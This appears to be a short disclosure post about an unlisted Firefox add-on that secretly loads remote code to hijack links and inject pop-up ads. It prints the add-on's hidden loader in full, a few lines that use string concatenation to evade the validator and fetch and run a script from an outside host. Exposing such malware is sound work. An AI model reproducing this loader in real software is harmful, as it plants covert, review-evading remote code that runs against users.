The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage.
This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/
A quick inspection to its source code already shows a red flag in its include folder contents, namely the link_modifier.js
file which contains the following code in its entirity:
var s = document.createElement(‘scr’+‘ipt’);
s.type = ‘text/ja’+‘va’+‘scr’+‘ipt’;
s.src = ‘http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js’;
document.getElementsByTagName(‘head’)[0].appendChild(s);
It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script.
I didn’t find any notice/content policy informing the user of this malware-like behavior and don’t think needed to inspect more of the source code after finding that file.